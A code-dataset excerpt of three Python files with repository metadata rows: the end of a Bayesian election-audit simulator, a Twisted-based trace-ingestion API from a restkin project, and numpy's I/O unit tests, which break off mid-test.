"NP" -- N union P
"NPc" -- Nc union Pc
returns ("OK",s) if the reported outcome seems OK
Otherwise it returns ("NOT OK",s)
where s is the number of ballots examined.
"""
n = len(r)-1 # number of ballots in r
assert len(r) == len(a) # should have the same length
assert min(r[1:]) >= 1
assert max(r[1:]) <= t
assert min(a[1:]) >= 1
assert max(a[1:]) <= t
R = tally(r,t)
reported_outcome = f(R)
A = tally(a,t)
actual_outcome = f(A)
prior_list = make_prior_list(audit_type,t,ballot_polling)
if printing_wanted:
print "%8d = number of ballot types"%t
print "%8d = number of total ballots"%n
print "%8.4f = epsilon (upset probabilitylimit)"%epsilon
print "audit_type = ",audit_type
print "%8d = number of priors"%len(prior_list)
for x in R[1:]:
print "%8d "%x,
print "= counts of reported ballots (reported outcome is %4d )"%reported_outcome
for x in A[1:]:
print "%8d "%x,
print "= counts of actual ballots (actual outcome is %4d )"%actual_outcome
print "Ballot-polling audit:",ballot_polling
# main loop -- do samples of given sizes from schedule
s = 0
# initialize counts to zero
if not ballot_polling:
count = [dummy] + [ [dummy]+[0]*t for j in xrange(1,t+1) ] # allocate this only once
else: # ballot-polling
count = [dummy]+[0]*t # allocate this only once
for next_s in schedule:
# audit enough ballots so that s = next_s
while s < next_s:
s = s + 1
# In practice you'd be looking at a paper ballot in the next line;
# in this code, we assume actual ballot types already available in array a.
pass # <-- audit ballot number s here; that is, determine a[s]
if not ballot_polling:
count[r[s]][a[s]] += 1
else:
count[a[s]] += 1
# now number of ballots audited is s
max_upset_prob = -1.0
for prior in prior_list:
# Determine probability of each outcome (dictionary "wins")
# Determine u the probability of an election upset
# Determine z the number of simulated profiles examined within upset_prob_dirichlet routine
wins,u,z = win_probs(r,a,t,s,n,count,ballot_polling,f,prior)
if printing_wanted:
print "After %6d ballots audited, probability of an upset is %7.4f"%(s,u),"(z = %4d simulated profiles)"%z,
print "(winning probabilities are:",wins,")"
max_upset_prob = max(u,max_upset_prob)
breakout = True
if breakout and max_upset_prob > epsilon: # don't bother with other priors
break
# decide to quit if max_upset prob is at most epsilon
if max_upset_prob<=epsilon:
if printing_wanted:
print "Reported election outcome is OK (%d ballots audited)"%s
# print "count:",count
return ("OK",s)
else:
if printing_wanted:
print "Reported election outcome was NOT OK !!! (All %d ballots audited)"%n
return ("NOT OK",s)
def win_probs(r,a,t,s,n,count,ballot_polling=False,f=f_plurality,prior=None):
"""
Use simulation to determine the probability of each outcome.
s is sample size (so far), 0 <= s <= n
for comparison audit:
count[j][k] is number of ballots of reported type j and actual type k (plus hyperparameter prior[j][k]) in ballots 1..s
for ballot-polling audit
count[k] is number of ballots of actual type k (plus hyperparameter prior[k]) in ballots 1..s
ballot_polling is True iff we want a ballot-polling audit
f is social choice function
return dictionary mapping outcomes to frequency of winning, upset probability, and max_trials
"""
R = tally(r,t) # tally of reported votes
if not ballot_polling: # only have reported votes if not ballot polling
reported_outcome = f(R)
max_trials = 10000 # determines accuracy of u (upset probability)
upsets = 0
B = [dummy] + [0]*t # allocate this only once (tally for simulated profile)
alphas = [dummy] + [0]*t # allocate only once (alphas for Dirichlet)
wins = dict() # keep track of number of wins for each outcome
for j in xrange(1,t+1):
wins[j] = 0
if not ballot_polling: # comparison audit
Rrem = [dummy] + [0]*t # Rrem[j] is number remaining unaudited of reported type j
for j in xrange(1,t+1):
Rrem[j] = R[j] # number remaining unaudited of reported type j
for j in xrange(1,t+1):
for k in xrange(1,t+1):
Rrem[j] -= count[j][k]
for z in xrange(1,max_trials+1):
for k in xrange(1,t+1):
B[k] = 0 # initialize tally for profile b to zero.
for j in xrange(1,t+1): # add in actual counts for ballots audited so far
for k in xrange(1,t+1):
B[k] += count[j][k]
for j in xrange(1,t+1): # for each reported type
for k in xrange(1,t+1):
alphas[k] = prior[j][k] + count[j][k]
ds = dirichlet(alphas,Rrem[j]) # note: Rrem[j] is remaining size of profile of reported type j after sample
for k in xrange(1,t+1):
B[k] += ds[k] # add to counts for sample
new_outcome = f(B)
wins[new_outcome] = wins.get(new_outcome,0)+1
if new_outcome != reported_outcome:
upsets += 1
else: # ballot-polling audit
for k in xrange(1,t+1):
alphas[k] = prior[k] + count[k]
for z in xrange(1,max_trials+1):
ds = dirichlet(alphas,n-s) # n-s = number of unaudited ballots
for k in xrange(1,t+1):
ds[k] += count[k] # add counts to dirichlet for simulated ballot tally
new_outcome = f(ds)
wins[new_outcome] = wins.get(new_outcome,0)+1
# for ballot-polling audit, "upset prob" is 1 - max winning prob
upsets = max_trials - max(wins.values())
for outcome in wins.keys():
wins[outcome] = float(wins[outcome])/float(max_trials)
u = float(upsets) / float(max_trials)
return wins,u,max_trials
| mit | -1,709,334,529,340,910,800 | 42.330645 | 127 | 0.553136 | false | 3.784469 | false | false | false |
zhaoxuan/baidu_restkin | restkin/api.py | 1 | 4948 | # Copyright 2012 Rackspace Hosting, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import pdb
from twisted.web import http
from twisted.python import log
from twisted.web.resource import Resource, NoResource
from tryfer.trace import Trace, Annotation, Endpoint
from restkin.utils import decode_hex_number
class RProxyWrapper(Resource):
rp_error_to_http_code = {
'NR-1000': http.UNAUTHORIZED,
'NR-1001': http.UNAUTHORIZED,
'NR-1002': http.UNAUTHORIZED,
'NR-5000': http.INTERNAL_SERVER_ERROR,
'NR-2000': 429 # httpbis - To Many Requests
}
def __init__(self, wrapped):
Resource.__init__(self)
self._wrapped = wrapped
def render(self, request):
headers = request.requestHeaders
rp_error_code = headers.getRawHeaders('X-RP-Error-Code')[0]
rp_error_response = headers.getRawHeaders('X-RP-Error-Message')[0]
request.setResponseCode(
self.rp_error_to_http_code.get(
rp_error_code, http.INTERNAL_SERVER_ERROR))
request.responseHeaders.setRawHeaders(
'Content-Type', ['application/json'])
return json.dumps({'ok': False,
'error_code': rp_error_code,
'error_message': rp_error_response})
def getChild(self, path, request):
if request.requestHeaders.hasHeader('X-RP-Error-Code'):
return self
return self._wrapped.getChild(path, request)
class RootResource(Resource):
def getChild(self, path, request):
if path == 'v1.0':
return VersionResource()
return NoResource()
class VersionResource(Resource):
def getChild(self, path, request):
if path == 'trace':
return TraceResource()
return NoResource()
# class TenantResource(Resource):
# def __init__(self, tenant_id):
# Resource.__init__(self)
# self._tenant_id = tenant_id
# def getChild(self, path, request):
# if path == 'trace':
# return TraceResource()
# return NoResource()
class TraceResource(Resource):
"""
TraceResource is responsible for taking POST requests and converting
the JSON output to a scribe log.
Response formats:
Success or partial failure:
{"succeeded": numberOfSucesfullyInsertedTraces,
"failed": numberOfTracesWhichFailedInsertion}
Failure due to invalid body:
{"error": "Error message"}
"""
def render_POST(self, request):
request.responseHeaders.setRawHeaders(
'content-type', ['application/json'])
body = request.content.read()
try:
spans = json.loads(body)
except ValueError:
log.err(None, 'Failed to decode request body')
msg = 'Could not decode request body (invalid JSON)'
return json.dumps({'error': msg})
succeeded, failed = 0, 0
for json_span in spans:
trace_id = None
span_id = None
try:
trace_id = decode_hex_number('trace_id', json_span['trace_id'])
span_id = decode_hex_number('span_id', json_span['span_id'])
parent_span_id = json_span.get('parent_span_id', None)
if parent_span_id is not None:
parent_span_id = decode_hex_number('parent_span_id',
parent_span_id)
t = Trace(json_span['name'], trace_id, span_id, parent_span_id)
for json_annotation in json_span['annotations']:
annotation = Annotation(
json_annotation['key'],
json_annotation['value'],
json_annotation['type'])
host = json_annotation.get('host', None)
if host:
annotation.endpoint = Endpoint(
host['ipv4'], host['port'], host['service_name'])
t.record(annotation)
succeeded = succeeded + 1
except Exception:
log.err(None,
'Failed to insert a trace: trace_id=%r,span_id=%r' %
(trace_id, span_id))
failed = failed + 1
continue
return json.dumps({'succeeded': succeeded, 'failed': failed})
| apache-2.0 | -2,226,201,732,277,251,300 | 30.316456 | 79 | 0.580841 | false | 4.258176 | false | false | false |
qpython-android/QPypi-numpy | numpy/lib/tests/test_io.py | 1 | 31157 | import numpy as np
import numpy.ma as ma
from numpy.ma.testutils import *
import StringIO
import gzip
import os
from tempfile import mkstemp, NamedTemporaryFile
import sys, time
from datetime import datetime
MAJVER, MINVER = sys.version_info[:2]
def strptime(s, fmt=None):
"""This function is available in the datetime module only
from Python >= 2.5.
"""
return datetime(*time.strptime(s, fmt)[:3])
class RoundtripTest(object):
def roundtrip(self, save_func, *args, **kwargs):
"""
save_func : callable
Function used to save arrays to file.
file_on_disk : bool
If true, store the file on disk, instead of in a
string buffer.
save_kwds : dict
Parameters passed to `save_func`.
load_kwds : dict
Parameters passed to `numpy.load`.
args : tuple of arrays
Arrays stored to file.
"""
save_kwds = kwargs.get('save_kwds', {})
load_kwds = kwargs.get('load_kwds', {})
file_on_disk = kwargs.get('file_on_disk', False)
if file_on_disk:
# Do not delete the file on windows, because we can't
# reopen an already opened file on that platform, so we
# need to close the file and reopen it, implying no
# automatic deletion.
if sys.platform == 'win32' and MAJVER >= 2 and MINVER >= 6:
target_file = NamedTemporaryFile(delete=False)
else:
target_file = NamedTemporaryFile()
load_file = target_file.name
else:
target_file = StringIO.StringIO()
load_file = target_file
arr = args
save_func(target_file, *arr, **save_kwds)
target_file.flush()
target_file.seek(0)
if sys.platform == 'win32' and not isinstance(target_file, StringIO.StringIO):
target_file.close()
arr_reloaded = np.load(load_file, **load_kwds)
self.arr = arr
self.arr_reloaded = arr_reloaded
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
self.roundtrip(a)
a = np.array([[1, 2], [3, 4]], int)
self.roundtrip(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.csingle)
self.roundtrip(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.cdouble)
self.roundtrip(a)
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
self.roundtrip(a)
@np.testing.dec.knownfailureif(sys.platform=='win32', "Fail on Win32")
def test_mmap(self):
a = np.array([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
self.roundtrip(a)
class TestSaveLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.save, *args, **kwargs)
assert_equal(self.arr[0], self.arr_reloaded)
class TestSavezLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.savez, *args, **kwargs)
for n, arr in enumerate(self.arr):
assert_equal(arr, self.arr_reloaded['arr_%d' % n])
def test_multiple_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
self.roundtrip(a,b)
def test_named_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = StringIO.StringIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(a, l['file_a'])
assert_equal(b, l['file_b'])
class TestSaveTxt(TestCase):
def test_array(self):
a =np.array([[1, 2], [3, 4]], float)
fmt = "%.18e"
c = StringIO.StringIO()
np.savetxt(c, a, fmt=fmt)
c.seek(0)
assert_equal(c.readlines(),
[(fmt + ' ' + fmt + '\n') % (1, 2),
(fmt + ' ' + fmt + '\n') % (3, 4)])
a =np.array([[1, 2], [3, 4]], int)
c = StringIO.StringIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), ['1 2\n', '3 4\n'])
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
c = StringIO.StringIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
lines = c.readlines()
assert_equal(lines, ['1\n', '2\n', '3\n', '4\n'])
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
c = StringIO.StringIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), ['1 2\n', '3 4\n'])
def test_delimiter(self):
a = np.array([[1., 2.], [3., 4.]])
c = StringIO.StringIO()
np.savetxt(c, a, delimiter=',', fmt='%d')
c.seek(0)
assert_equal(c.readlines(), ['1,2\n', '3,4\n'])
def test_format(self):
a = np.array([(1, 2), (3, 4)])
c = StringIO.StringIO()
# Sequence of formats
np.savetxt(c, a, fmt=['%02d', '%3.1f'])
c.seek(0)
assert_equal(c.readlines(), ['01 2.0\n', '03 4.0\n'])
# A single multiformat string
c = StringIO.StringIO()
np.savetxt(c, a, fmt='%02d : %3.1f')
c.seek(0)
lines = c.readlines()
assert_equal(lines, ['01 : 2.0\n', '03 : 4.0\n'])
# Specify delimiter, should be overiden
c = StringIO.StringIO()
np.savetxt(c, a, fmt='%02d : %3.1f', delimiter=',')
c.seek(0)
lines = c.readlines()
assert_equal(lines, ['01 : 2.0\n', '03 : 4.0\n'])
class TestLoadTxt(TestCase):
def test_record(self):
c = StringIO.StringIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=[('x', np.int32), ('y', np.int32)])
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_array_equal(x, a)
d = StringIO.StringIO()
d.write('M 64.0 75.0\nF 25.0 60.0')
d.seek(0)
mydescriptor = {'names': ('gender','age','weight'),
'formats': ('S1',
'i4', 'f4')}
b = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=mydescriptor)
y = np.loadtxt(d, dtype=mydescriptor)
assert_array_equal(y, b)
def test_array(self):
c = StringIO.StringIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([[1, 2], [3, 4]], int)
assert_array_equal(x, a)
c.seek(0)
x = np.loadtxt(c, dtype=float)
a = np.array([[1, 2], [3, 4]], float)
assert_array_equal(x, a)
def test_1D(self):
c = StringIO.StringIO()
c.write('1\n2\n3\n4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
c = StringIO.StringIO()
c.write('1,2,3,4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
def test_missing(self):
c = StringIO.StringIO()
c.write('1,2,3,,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or -999)})
a = np.array([1, 2, 3, -999, 5], int)
assert_array_equal(x, a)
def test_converters_with_usecols(self):
c = StringIO.StringIO()
c.write('1,2,3,,5\n6,7,8,9,10\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or -999)}, \
usecols=(1, 3,))
a = np.array([[2, -999], [7, 9]], int)
assert_array_equal(x, a)
def test_comments(self):
c = StringIO.StringIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
comments='#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_skiprows(self):
c = StringIO.StringIO()
c.write('comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = StringIO.StringIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_usecols(self):
a = np.array([[1, 2], [3, 4]], float)
c = StringIO.StringIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1,))
assert_array_equal(x, a[:,1])
a =np.array([[1, 2, 3], [3, 4, 5]], float)
c = StringIO.StringIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1, 2))
assert_array_equal(x, a[:, 1:])
# Testing with arrays instead of tuples.
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=np.array([1, 2]))
assert_array_equal(x, a[:, 1:])
# Checking with dtypes defined converters.
data = '''JOE 70.1 25.3
BOB 60.5 27.9
'''
c = StringIO.StringIO(data)
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
arr = np.loadtxt(c, usecols=(0, 2), dtype=zip(names, dtypes))
assert_equal(arr['stid'], ["JOE", "BOB"])
assert_equal(arr['temp'], [25.3, 27.9])
def test_fancy_dtype(self):
c = StringIO.StringIO()
c.write('1,2,3.0\n4,5,6.0\n')
c.seek(0)
dt = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
x = np.loadtxt(c, dtype=dt, delimiter=',')
a = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dt)
assert_array_equal(x, a)
def test_empty_file(self):
c = StringIO.StringIO()
assert_raises(IOError, np.loadtxt, c)
def test_unused_converter(self):
c = StringIO.StringIO()
c.writelines(['1 21\n', '3 42\n'])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_array_equal(data, [21, 42])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_array_equal(data, [33, 66])
class Testfromregex(TestCase):
def test_record(self):
c = StringIO.StringIO()
c.write('1.312 foo\n1.534 bar\n4.444 qux')
c.seek(0)
dt = [('num', np.float64), ('val', 'S3')]
x = np.fromregex(c, r"([0-9.]+)\s+(...)", dt)
a = np.array([(1.312, 'foo'), (1.534, 'bar'), (4.444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_2(self):
c = StringIO.StringIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.int32), ('val', 'S3')]
x = np.fromregex(c, r"(\d+)\s+(...)", dt)
a = np.array([(1312, 'foo'), (1534, 'bar'), (4444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_3(self):
c = StringIO.StringIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.float64)]
x = np.fromregex(c, r"(\d+)\s+...", dt)
a = np.array([(1312,), (1534,), (4444,)], dtype=dt)
assert_array_equal(x, a)
#####--------------------------------------------------------------------------
class TestFromTxt(TestCase):
#
def test_record(self):
"Test w/ explicit dtype"
data = StringIO.StringIO('1 2\n3 4')
# data.seek(0)
test = np.ndfromtxt(data, dtype=[('x', np.int32), ('y', np.int32)])
control = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_equal(test, control)
#
data = StringIO.StringIO('M 64.0 75.0\nF 25.0 60.0')
# data.seek(0)
descriptor = {'names': ('gender','age','weight'),
'formats': ('S1', 'i4', 'f4')}
control = np.array([('M', 64.0, 75.0), ('F', 25.0, 60.0)],
dtype=descriptor)
test = np.ndfromtxt(data, dtype=descriptor)
assert_equal(test, control)
def test_array(self):
"Test outputing a standard ndarray"
data = StringIO.StringIO('1 2\n3 4')
control = np.array([[1,2],[3,4]], dtype=int)
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data.seek(0)
control = np.array([[1,2],[3,4]], dtype=float)
test = np.loadtxt(data, dtype=float)
assert_array_equal(test, control)
def test_1D(self):
"Test squeezing to 1D"
control = np.array([1, 2, 3, 4], int)
#
data = StringIO.StringIO('1\n2\n3\n4\n')
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data = StringIO.StringIO('1,2,3,4\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',')
assert_array_equal(test, control)
def test_comments(self):
"Test the stripping of comments"
control = np.array([1, 2, 3, 5], int)
# Comment on its own line
data = StringIO.StringIO('# comment\n1,2,3,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
# Comment at the end of a line
data = StringIO.StringIO('1,2,3,5# comment\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
def test_skiprows(self):
"Test row skipping"
control = np.array([1, 2, 3, 5], int)
#
data = StringIO.StringIO('comment\n1,2,3,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', skiprows=1)
assert_equal(test, control)
#
data = StringIO.StringIO('# comment\n1,2,3,5\n')
test = np.loadtxt(data, dtype=int, delimiter=',', skiprows=1)
assert_equal(test, control)
def test_header(self):
"Test retrieving a header"
data = StringIO.StringIO('gender age weight\nM 64.0 75.0\nF 25.0 60.0')
test = np.ndfromtxt(data, dtype=None, names=True)
control = {'gender': np.array(['M', 'F']),
'age': np.array([64.0, 25.0]),
'weight': np.array([75.0, 60.0])}
assert_equal(test['gender'], control['gender'])
assert_equal(test['age'], control['age'])
assert_equal(test['weight'], control['weight'])
def test_auto_dtype(self):
"Test the automatic definition of the output dtype"
data = StringIO.StringIO('A 64 75.0 3+4j True\nBCD 25 60.0 5+6j False')
test = np.ndfromtxt(data, dtype=None)
control = [np.array(['A', 'BCD']),
np.array([64, 25]),
np.array([75.0, 60.0]),
np.array([3+4j, 5+6j]),
np.array([True, False]),]
assert_equal(test.dtype.names, ['f0','f1','f2','f3','f4'])
for (i, ctrl) in enumerate(control):
assert_equal(test['f%i' % i], ctrl)
def test_auto_dtype_uniform(self):
"Tests whether the output dtype can be uniformized"
data = StringIO.StringIO('1 2 3 4\n5 6 7 8\n')
test = np.ndfromtxt(data, dtype=None)
control = np.array([[1,2,3,4],[5,6,7,8]])
assert_equal(test, control)
def test_fancy_dtype(self):
"Check that a nested dtype isn't MIA"
data = StringIO.StringIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.ndfromtxt(data, dtype=fancydtype, delimiter=',')
control = np.array([(1,(2,3.0)),(4,(5,6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_names_overwrite(self):
"Test overwriting the names of the dtype"
descriptor = {'names': ('g','a','w'),
'formats': ('S1', 'i4', 'f4')}
data = StringIO.StringIO('M 64.0 75.0\nF 25.0 60.0')
names = ('gender','age','weight')
test = np.ndfromtxt(data, dtype=descriptor, names=names)
descriptor['names'] = names
control = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=descriptor)
assert_equal(test, control)
def test_commented_header(self):
"Check that names can be retrieved even if the line is commented out."
data = StringIO.StringIO("""
#gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
# The # is part of the first name and should be deleted automatically.
test = np.genfromtxt(data, names=True, dtype=None)
ctrl = np.array([('M', 21, 72.1), ('F', 35, 58.33), ('M', 33, 21.99)],
dtype=[('gender','|S1'), ('age', int), ('weight', float)])
assert_equal(test, ctrl)
# Ditto, but we should get rid of the first element
data = StringIO.StringIO("""
# gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
test = np.genfromtxt(data, names=True, dtype=None)
assert_equal(test, ctrl)
def test_autonames_and_usecols(self):
"Tests names and usecols"
data = StringIO.StringIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'),
names=True, dtype=None)
control = np.array(('aaaa', 45, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_with_usecols(self):
"Test the combination user-defined converters and usecol"
data = StringIO.StringIO('1,2,3,,5\n6,7,8,9,10\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',',
converters={3:lambda s: int(s or -999)},
usecols=(1, 3, ))
control = np.array([[2, -999], [7, 9]], int)
assert_equal(test, control)
def test_converters_with_usecols_and_names(self):
"Tests names and usecols"
data = StringIO.StringIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'), names=True,
dtype=None, converters={'C':lambda s: 2 * int(s)})
control = np.array(('aaaa', 90, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_cornercases(self):
"Test the conversion to datetime."
converter = {'date': lambda s: strptime(s, '%Y-%m-%d %H:%M:%SZ')}
data = StringIO.StringIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date','stid'], converters=converter)
control = np.array((datetime(2009,02,03), 72214.),
dtype=[('date', np.object_), ('stid', float)])
assert_equal(test, control)
def test_unused_converter(self):
"Test whether unused converters are forgotten"
data = StringIO.StringIO("1 21\n 3 42\n")
test = np.ndfromtxt(data, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_equal(test, [21, 42])
#
data.seek(0)
test = np.ndfromtxt(data, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_equal(test, [33, 66])
def test_dtype_with_converters(self):
dstr = "2009; 23; 46"
test = np.ndfromtxt(StringIO.StringIO(dstr,),
delimiter=";", dtype=float, converters={0:str})
control = np.array([('2009', 23., 46)],
dtype=[('f0','|S4'), ('f1', float), ('f2', float)])
assert_equal(test, control)
test = np.ndfromtxt(StringIO.StringIO(dstr,),
delimiter=";", dtype=float, converters={0:float})
control = np.array([2009., 23., 46],)
assert_equal(test, control)
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = """
1; 2001-01-01
2; 2002-01-31
"""
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.genfromtxt(StringIO.StringIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array([(1, datetime(2001,1,1)), (2, datetime(2002,1,31))],
dtype=ndtype)
assert_equal(test, control)
#
ndtype = [('nest', [('idx', int), ('code', np.object)])]
try:
test = np.genfromtxt(StringIO.StringIO(data), delimiter=";",
dtype=ndtype, converters=converters)
except NotImplementedError:
pass
else:
errmsg = "Nested dtype involving objects should be supported."
raise AssertionError(errmsg)
def test_userconverters_with_explicit_dtype(self):
"Test user_converters w/ explicit (standard) dtype"
data = StringIO.StringIO('skip,skip,2001-01-01,1.0,skip')
test = np.genfromtxt(data, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: str})
control = np.array([('2001-01-01', 1.)],
dtype=[('', '|S10'), ('', float)])
assert_equal(test, control)
def test_spacedelimiter(self):
"Test space delimiter"
data = StringIO.StringIO("1 2 3 4 5\n6 7 8 9 10")
test = np.ndfromtxt(data)
control = np.array([[ 1., 2., 3., 4., 5.],
[ 6., 7., 8., 9.,10.]])
assert_equal(test, control)
def test_missing(self):
data = StringIO.StringIO('1,2,3,,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or -999)})
control = np.array([1, 2, 3, -999, 5], int)
assert_equal(test, control)
def test_usecols(self):
"Test the selection of columns"
# Select 1 column
control = np.array( [[1, 2], [3, 4]], float)
data = StringIO.StringIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1,))
assert_equal(test, control[:, 1])
#
control = np.array( [[1, 2, 3], [3, 4, 5]], float)
data = StringIO.StringIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1, 2))
assert_equal(test, control[:, 1:])
# Testing with arrays instead of tuples.
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=np.array([1, 2]))
assert_equal(test, control[:, 1:])
# Checking with dtypes defined converters.
data = StringIO.StringIO("""JOE 70.1 25.3\nBOB 60.5 27.9""")
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
test = np.ndfromtxt(data, usecols=(0, 2), dtype=zip(names, dtypes))
assert_equal(test['stid'], ["JOE", "BOB"])
assert_equal(test['temp'], [25.3, 27.9])
def test_empty_file(self):
"Test that an empty file raises the proper exception"
data = StringIO.StringIO()
assert_raises(IOError, np.ndfromtxt, data)
def test_fancy_dtype_alt(self):
"Check that a nested dtype isn't MIA"
data = StringIO.StringIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.mafromtxt(data, dtype=fancydtype, delimiter=',')
control = ma.array([(1,(2,3.0)),(4,(5,6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_withmissing(self):
data = StringIO.StringIO('A,B\n0,1\n2,N/A')
test = np.mafromtxt(data, dtype=None, delimiter=',', missing='N/A',
names=True)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
#
data.seek(0)
test = np.mafromtxt(data, delimiter=',', missing='N/A', names=True)
control = ma.array([(0, 1), (2, -1)],
mask=[[False, False], [False, True]],)
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_user_missing_values(self):
datastr ="A, B, C\n0, 0., 0j\n1, N/A, 1j\n-9, 2.2, N/A\n3, -99, 3j"
data = StringIO.StringIO(datastr)
basekwargs = dict(dtype=None, delimiter=',', names=True, missing='N/A')
mdtype = [('A', int), ('B', float), ('C', complex)]
#
test = np.mafromtxt(data, **basekwargs)
control = ma.array([( 0, 0.0, 0j), (1, -999, 1j),
( -9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)],
dtype=mdtype)
assert_equal(test, control)
#
data.seek(0)
test = np.mafromtxt(data,
missing_values={0:-9, 1:-99, 2:-999j}, **basekwargs)
control = ma.array([( 0, 0.0, 0j), (1, -999, 1j),
( -9, 2.2, -999j), (3, -99, 3j)],
